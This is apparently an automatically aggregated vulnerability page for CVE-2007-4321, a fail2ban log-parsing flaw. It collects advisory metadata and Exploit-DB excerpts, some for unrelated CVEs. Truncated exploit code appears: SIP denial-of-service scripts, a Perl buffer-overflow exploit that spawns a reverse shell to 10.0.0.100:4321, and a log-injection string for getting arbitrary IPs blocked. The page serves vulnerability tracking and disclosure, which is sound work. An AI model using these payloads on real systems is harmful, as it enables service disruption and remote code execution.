CVE-2007-4321
Published: 2007-08-14
Priority: P3 (medium) · CVSS 2.0 base score 6.8
CVSS vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
Exploit: available (see Exploit-DB entry below)
EPSS: 5.75% (92.1st percentile)
fail2ban 0.8 and earlier does not properly parse sshd log files, which allows remote attackers to add arbitrary hosts to the /etc/hosts.deny file and cause a denial of service by adding arbitrary IP addresses to the sshd log file, as demonstrated by logging in via ssh with a client protocol version identification containing an IP address string, a different vector than CVE-2006-6302.
Affected

| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | fail2ban | < fail2ban 0.8.0-4 (bookworm) | fail2ban 0.8.0-4 (bookworm) |
| debian | fail2ban | < fail2ban 0.8.3-2sid1 (bookworm) | fail2ban 0.8.3-2sid1 (bookworm) |
| fail2ban | fail2ban | >= 0 < 0.8.3-2sid1 | 0.8.3-2sid1 |
| fail2ban | fail2ban | >= 0 < 0.8.0-4 | 0.8.0-4 |
CVSS provenance

| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 2.0 | 6.8 | MEDIUM | AV:N/AC:M/Au:N/C:P/I:P/A:P |
| osv | — | 6.8 | MEDIUM | — |
| vendor_debian | — | 6.8 | LOW | — |
| vendor_redhat | — | 6.8 | MEDIUM | — |
GHSA · GHSA-rc77-w9xr-6vvf: filter
ghsa_unreviewed · 2022-05-02 · CVSS 6.8 · CVE-2009-0362 [MEDIUM] · CWE-287
filter.d/wuftpd.conf in Fail2ban 0.8.3 uses an incorrect regular expression that allows remote attackers to cause a denial of service (forced authentication failures) via a crafted reverse-resolved DNS name (rhost) entry that contains a substring that is interpreted as an IP address, a different vulnerability than CVE-2007-4321.
GHSA · GHSA-5jfx-9p58-q8pj: fail2ban 0
ghsa_unreviewed · 2022-05-01 · CVSS 5.0 · CVE-2007-4321 [MEDIUM]
OSV · CVE-2009-0362: filter
osv · 2009-02-13 · CVSS 6.8 · CVE-2009-0362 [MEDIUM]
OSV · CVE-2007-4321: fail2ban 0
osv · 2007-08-14 · CVSS 5.0 · CVE-2007-4321 [MEDIUM]
Red Hat · fail2ban: remote DoS via crafted domain names
vendor_redhat · 2009-02-04 · CVSS 6.8 · CVE-2009-0362 [MEDIUM]
Debian · CVE-2009-0362: fail2ban - filter.d/wuftpd.conf in Fail2ban 0.8.3 uses an incorrect regular expression that...
vendor_debian · 2009 · CVSS 6.8 · CVE-2009-0362 [MEDIUM]
Scope: local
bookworm: resolved (fixed in 0.8.3-2sid1)
bullseye: resolved (fixed in 0.8.3-2sid1)
forky: resolved (fixed in 0.8.3-2sid1)
sid: resolved (fixed in 0.8.3-2sid1)
trixie: resolved (fixed in 0.8.3-2sid1)
Debian · CVE-2007-4321: fail2ban - fail2ban 0.8 and earlier does not properly parse sshd log files, which allows re...
vendor_debian · 2007 · CVSS 5.0 · CVE-2007-4321 [MEDIUM]
Scope: local
bookworm: resolved (fixed in 0.8.0-4)
bullseye: resolved (fixed in 0.8.0-4)
forky: resolved (fixed in 0.8.0-4)
sid: resolved (fixed in 0.8.0-4)
trixie: resolved (fixed in 0.8.0-4)
No detection rules found.
Exploit-DB · OpenH323 Opal SIP Protocol - Remote Denial of Service
exploitdb · 2009-07-24 · CVSS 5.0 · CVE-2007-4924 [MEDIUM]
---
#!/usr/bin/env python
#
# OpenH323 Opal SIP Protocol Remote Denial of Service Vulnerability (CVE-2007-4924)
#
# opal228_dos.py by Jose Miguel Esparza
# 2007-10-08 S21sec labs
import sys,socket
if len(sys.argv) != 3:
sys.exit("Usage: " + sys.argv[0] + " target_host target_port\n")
target = sys.argv[1]
targetPort = int(sys.argv[2])
malformedRequest = "INVITE sip:[email protected] SIP/2.0\r\n"+\
"Call-ID:[email protected]\r\n"+\
"Contact:sip:[email protected]:5060\r\n"+\
"Content-Length:-40999990\r\n"+\
"Content-Type:application/sdp\r\n"+\
"CSeq:4321 INVITE\r\n"+\
"From:sip:[email protected]:5060;tag=a48s\r\n"+\
"Max-Forwards:70\r\n"+\
"To:sip:[email protected]\r\n"+\
"Via:SIP/2.0/UDP 192.168.1.133:5
Exploit-DB · Ekiga 2.0.5 - 'GetHostAddress' Remote Denial of Service
exploitdb · 2009-07-24 · CVSS 5.0 · CVE-2007-4897 [MEDIUM]
---
#!/usr/bin/env python
#
# Ekiga GetHostAddress Remote Denial of Service Vulnerability (CVE-2007-4897)
#
# ekiga207_dos.py by Jose Miguel Esparza
# 2007-09-11 S21sec labs
import sys,socket
if len(sys.argv) != 3:
sys.exit("Usage: " + sys.argv[0] + " target_host target_port\n")
target = sys.argv[1]
targetPort = int(sys.argv[2])
malformedRequest = "INVITE "+'A'*1005+" SIP/2.0\r\n"+\
"Call-ID:[email protected]\r\n"+\
"Contact:sip:[email protected]:5060\r\n"+\
"Content-Length:417\r\n"+\
"Content-Type:application/sdp\r\n"+\
"CSeq:4321 INVITE\r\n"+\
"From:sip:[email protected]:5060;tag=a48s\r\n"+\
"Max-Forwards:70\r\n"+\
"To:sip:[email protected]\r\n"+\
"Via:SIP/2.0/UDP 172.91.1.148:5060;branch=z9hG4bK74b7
Exploit-DB · FSFDT v3.000 d9 - 'HELP' Remote Buffer Overflow
exploitdb · 2007-10-04 · CVE-2007-5256
---
# ~$ nc -l -p 4321
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# E:\draft\fsd1110\windows>_
#
# -------------------------------------------
#!/usr/bin/perl
# FSFDT remote exploit by weak[at]fraglab.at
# spawns reverse shell to 10.0.0.100:4321
# tested against 'FSFDT Windows FSD Beta from FSD V3.000 draft 9' on win2k sp4
use IO::Socket;
if( $#ARGV ";
exit();
}
my $ip = $ARGV[0];
my $port = $ARGV[1];
print "connecting...\n";
my $sock = new IO::Socket::INET ( PeerAddr => $ip, PeerPort => $port, Proto => 'tcp', );
die "could not create socket: $!\n" unless $sock;
# jmp esp in KERNEL32.DLL 5.0.2195.7006
my $jmpesp = "\xB7\x49\xE7\x77";
# encoded 'jmp 0x400' to jump to stage2
my $jmpcode =
"
Exploit-DB · FSD 2.052/3.000 - 'sysuser.cc sysuser::exechelp' 'HELP' Remote Overflow
exploitdb · 2007-10-01 · CVE-2007-5256
---
source: https://www.securityfocus.com/bid/25883/info
FSD is prone to multiple remote buffer-overflow vulnerabilities because the application fails to perform adequate boundary-checks on user-supplied data.
An attacker can exploit these issues to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
These issues affect FSD 2.052 d9 and 3.0000 d9; other versions may also be affected.
#!/usr/bin/perl
# FSFDT remote exploit by weak[at]fraglab.at
# spawns reverse shell to 10.0.0.100:4321
# tested against 'FSFDT Windows FSD Beta from FSD V3.000 draft 9' on win2k sp4
use IO::Socket;
if( $#ARGV ";
exit();
}
my $ip = $ARGV[0];
my
Exploit-DB · Fail2ban 0.8 - Remote Denial of Service
exploitdb · 2007-07-28 · CVE-2007-4321
---
source: https://www.securityfocus.com/bid/25117/info
Fail2ban is prone to a remote denial-of-service vulnerability because the application fails to properly ensure the validity of authentication-failure messages.
Successfully exploiting this issue allows remote attackers to add arbitrary IP addresses to the block list used by the application. This allows attackers to deny further network access to arbitrary IP addresses, denying service to legitimate users.
Fail2ban 0.8.0 and prior versions are vulnerable to this issue.
This issue may be demonstrated by connecting to an SSH server with 'nc', and sending the following string:
ROOT LOGIN REFUSED hi FROM 1.2.3.4
where '1.2.3.4' is an IP address to be blocked.
Bugzilla · CVE-2009-0362 fail2ban: remote DoS via crafted domain names
bugzilla · 2009-02-13 · CVSS 6.8 · CVE-2009-0362 [MEDIUM]
Name: CVE-2009-0362
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0362
Assigned: 20090129
Reference: CONFIRM: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514163
Reference: BID:33734
Reference: URL: http://www.securityfocus.com/bid/33734
Reference: SECUNIA:33890
Reference: URL: http://secunia.com/advisories/33890
filter.d/wuftpd.conf in Fail2ban 0.8.3 uses an incorrect regular expression that allows remote attackers to cause a denial of service (forced authentication failures) via a crafted reverse-resolved DNS name (rhost) entry that contains a substring that is interpreted as an IP address, a different vulnerability than CVE-2007-4321.
Discussion:
Created attachment 331847
patch to fix the issue taken from
Bugzilla · CVE-2007-4584 Buffer overflow in IrcII by long MODE from server
bugzilla · 2007-09-24 · CVSS 10.0 · CVE-2007-4584 [CRITICAL]
Common Vulnerabilities and Exposures assigned an identifier CVE-2007-4584 to the following vulnerability:
Stack-based buffer overflow in BitchX 1.1 Final allows remote IRC servers to execute arbitrary code via a long string in a MODE command, related to the p_mode variable.
References:
http://www.milw0rm.com/exploits/4321
http://www.securityfocus.com/bid/25462
http://www.frsirt.com/english/advisories/2007/2994
http://secunia.com/advisories/26578
http://xforce.iss.net/xforce/xfdb/36306
Discussion:
This flaw does not affect the version of IrcII shipped in the ircii package with Red Hat Enterprise Linux version 2.1.
References
http://bugs.gentoo.org/show_bug.cgi?id=181214
http://osvdb.org/42484
http://secunia.com/advisories/23237
http://secunia.com/advisories/28374
http://security.gentoo.org/glsa/glsa-200707-13.xml
http://www.debian.org/security/2008/dsa-1456
http://www.ossec.net/en/attacking-loganalysis.html
http://www.securityfocus.com/bid/25117